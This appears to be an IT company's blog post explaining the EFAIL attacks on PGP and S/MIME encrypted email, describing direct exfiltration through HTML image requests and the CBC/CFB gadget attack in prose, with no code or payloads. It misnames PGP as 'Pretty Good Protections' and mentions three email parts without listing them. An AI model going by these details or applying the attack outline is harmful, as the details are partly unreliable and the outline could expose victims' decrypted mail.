Emails have always had a fickle feeling security. Often we see and hear news about peoples emails getting hacked and losing vital personal information or important business information. Even in our government we have seen multiple occasions when high ranking officials have lost access to their email or had it hacked. This goes to show no matter your status, in the world of emails, we are all the same.
Continuing along the line of that knowledge, researchers at the Munster University of Applied Sciences have found new ways in which our emails are vulnerable, specifically involving the Pretty Good Protections (PGP) and S/MIME technologies that encrypt emails.
So whats this new vulnerability? Well the problem resides in how email clients use plug-ins to decrypt (read) HTML-based emails. As a result, companies and individuals are being encouraged to turn off the problem programs (PGP, S/MIME) and search for an alternate email encryption program.
The vulnerability has been termed “EFAIL” and abuses active content rendered within HTML-based emails. Such active content would be considered things like images, page styles, and other non-text content. However in order for the hacker to commence with EFAIL, they must first have their hands on the email, either through eavesdropping, hacking into the email server or other means.
So far the attack has been broken into two defining methods that vary depending on the email hosts.
The First Method
The first method of attack is called “Direct Exfiltration” and abuses vulnerabilities in Apple Mail, iOS Mail, and Mozilla Thunderbird. The hackers create and HTML-based email that is made up of three parts.
Once the new email is completed, the hacker then sends this new reformatted email to the victim, and the infiltration is started.
When the victim receives this email, the email client reads and decrypts the second section of the email (PGP or S/MIME) and then combines all three sections into one whole email. Once that is accomplished, the email converts everything into a URL form which starts with the hackers address and sends a request to their URL to retrieve a non-existing image and retrieves instead, the entire decrypted message.
The Second Method
The second form of attack is called the “CBC/CFB Gadget Attack”, which resides inside the aforementioned PGP or S/MIME specifications, affecting all email clients. For this attack the hacker locates the first block of plain text that is encrypted in the stolen email and then adds a fake block of text filled with zeroes. The attacker then injects the zeroed text with image tags, creating a single encrypted body part, that when is opened by the victim’s client, exposes the plain text to the hacker.
Currently there is no patch for this vulnerability, however there has been talk that one is being produced as we speak. To avoid these problems however, simply avoid PGP and S/MIME for your email encryption.
give us a call or send us an email and let’s take a look at your system and its defenses!